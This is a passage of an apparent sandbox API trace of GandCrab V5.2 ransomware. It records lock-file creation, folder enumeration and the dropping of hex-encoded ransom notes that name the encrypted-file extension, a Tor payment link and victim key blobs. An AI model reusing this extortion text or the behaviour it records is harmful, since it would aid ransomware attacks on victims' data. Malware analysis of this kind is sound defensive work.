6\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.909] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.910] CloseHandle (hObject=0x230) returned 1 [0096.910] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.910] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.910] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0xdf)) [0096.910] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.910] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.910] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.910] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Recent\\d2ca4a09d2ca4deb61a.lock") returned 48 [0096.911] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\recent\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.911] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.911] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.912] lstrlenW (lpString="C:\\Users\\Default\\Recent\\") returned 24 [0096.912] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Recent\\*") returned="C:\\Users\\Default\\Recent\\*" [0096.912] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Recent\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.912] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Recent\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.912] CloseHandle (hObject=0x230) returned 1 [0096.912] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.912] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0096.912] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0096.912] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Saved Games" | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0096.912] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Saved Games\\") returned="C:\\Users\\Default\\Saved Games\\" [0096.912] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.912] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.912] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.913] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.913] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.913] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.913] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.913] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.913] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.913] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.913] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.914] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Saved Games\\\\TITWMVJL-DECRYPT.txt") returned 50 [0096.914] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\saved games\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.914] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x